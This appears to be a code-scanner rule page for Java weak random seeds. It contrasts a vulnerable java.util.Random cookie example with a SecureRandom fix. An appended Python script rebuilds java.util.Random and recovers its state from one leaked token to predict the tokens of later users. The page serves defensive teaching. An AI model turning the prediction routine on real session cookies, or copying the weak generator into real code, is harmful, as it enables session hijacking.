Java Weak Random Seed
Description
Detects the use of a weak random number generator (such as java.util.Random) to produce cookie values in Java applications. java.util.Random is a 48-bit linear congruential generator whose outputs expose its internal state, so an attacker who obtains one or two of its outputs can reproduce every value it will generate next. Predictable cookie values let an attacker guess or compute session identifiers and other sensitive tokens, which can lead to session hijacking.
Detection Strategy
• Identifies calls to the addCookie() method in Java code
• Examines how the cookie value was generated to check whether it comes from a weak random number generator (such as java.util.Random)
• Reports a vulnerability when a cookie is created from weak random number generation instead of a secure alternative such as java.security.SecureRandom
• Specifically inspects the object and the arguments of the addCookie() call to determine whether weak randomization was used
Vulnerable code example
import javax.servlet.http.HttpServletRequest;
import java.util.Random;
public class VulnerableRandomExample {
    public void doPost(HttpServletRequest request) {
        // Vulnerable: Using java.util.Random() for security-sensitive token generation
        // java.util.Random is a 48-bit LCG: a single nextLong() value exposes its entire state
        long randomValue = new Random().nextLong();
        String rememberMeKey = Long.toString(randomValue);
        // ...
    }
}
✅ Secure code example
import javax.servlet.http.HttpServletRequest;
import java.security.SecureRandom; // Using SecureRandom instead of Random
import java.util.Base64;
public class SecureRandomExample {
    private final SecureRandom secureRandom = new SecureRandom(); // Create single instance for reuse
    public void doPost(HttpServletRequest request) {
        byte[] token = new byte[32]; // 256 bits of CSPRNG output
        secureRandom.nextBytes(token);
        String rememberMeKey = Base64.getUrlEncoder().withoutPadding().encodeToString(token); // URL-safe, cookie-friendly encoding
        // ...
    }
}
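Why the vulnerable example is exploitable, as an added example that is not code from the original page or from Fluid Attacks: the block below is a Python reimplementation of the java.util.Random algorithm (the 48-bit linear congruential generator documented in the JDK Javadoc) plus an attacker routine that recovers the generator's state from a single rememberMe value produced with nextLong() and then predicts every later value. The seed, the function names and the "leaked token" scenario are assumptions made for this example.

```python
"""Model of java.util.Random (48-bit LCG, per the JDK Javadoc) and a state
recovery attack: one leaked nextLong() value is enough to predict all later
values. Example code written for this page, not part of the original page."""

MULT = 0x5DEECE66D          # multiplier from the Javadoc
INC = 0xB                   # increment from the Javadoc
MASK48 = (1 << 48) - 1      # the generator keeps only 48 bits of state


def _to_signed32(u):
    return u - (1 << 32) if u >= (1 << 31) else u


def _to_signed64(u):
    u &= (1 << 64) - 1
    return u - (1 << 64) if u >= (1 << 63) else u


class JavaRandom:
    """Bit-exact model of java.util.Random(long seed)."""

    def __init__(self, seed):
        # The constructor scrambles the seed with the multiplier.
        self.state = (seed ^ MULT) & MASK48

    @classmethod
    def from_state(cls, state):
        # Position a generator at a known internal state (no scrambling).
        obj = cls.__new__(cls)
        obj.state = state & MASK48
        return obj

    def _next(self, bits):
        # next(bits): advance the LCG and return the top `bits` bits of the state.
        self.state = (self.state * MULT + INC) & MASK48
        return self.state >> (48 - bits)

    def next_int(self):
        return _to_signed32(self._next(32))

    def next_long(self):
        # nextLong() = ((long) next(32) << 32) + next(32), with 64-bit wraparound
        hi = self.next_int()
        lo = self.next_int()
        return _to_signed64((hi << 32) + lo)


def split_long(value):
    """Undo nextLong(): return the two unsigned 32-bit next(32) outputs."""
    lo = _to_signed32(value & 0xFFFFFFFF)
    hi = (value - lo) >> 32
    return hi & 0xFFFFFFFF, lo & 0xFFFFFFFF


def recover_states(out1, out2):
    """Given two consecutive unsigned next(32) outputs, return every 48-bit
    state (after the second call) consistent with them. The top 32 bits of
    the state after the first call are out1 itself, so only 16 bits are
    unknown and a brute force of 65536 candidates suffices."""
    found = []
    for low in range(1 << 16):
        candidate = (out1 << 16) | low
        nxt = (candidate * MULT + INC) & MASK48
        if nxt >> 16 == out2:
            found.append(nxt)
    return found


def predict_next_longs(leaked_long, count):
    """Predict the next `count` nextLong() values from one leaked value."""
    out1, out2 = split_long(leaked_long)
    states = recover_states(out1, out2)
    if len(states) != 1:
        raise ValueError("ambiguous state, a second leaked value is needed")
    rng = JavaRandom.from_state(states[0])
    return [rng.next_long() for _ in range(count)]


if __name__ == "__main__":
    # Constructed scenario: the server's generator, seeded with an assumed value.
    victim = JavaRandom(1700000000000)
    leaked = victim.next_long()   # the attacker's own rememberMe key
    # The attacker now computes the keys handed to the next three users.
    print(predict_next_longs(leaked, 3) == [victim.next_long() for _ in range(3)])
```

The seed is irrelevant to the attack: `new Random()` with no argument seeds itself from a counter and System.nanoTime(), but the attacker never needs the seed, only one output. With nextInt() the attacker needs two consecutive values instead of one (recover_states takes them directly). SecureRandom has no such structure, which is why the detection strategy treats it as the acceptable alternative.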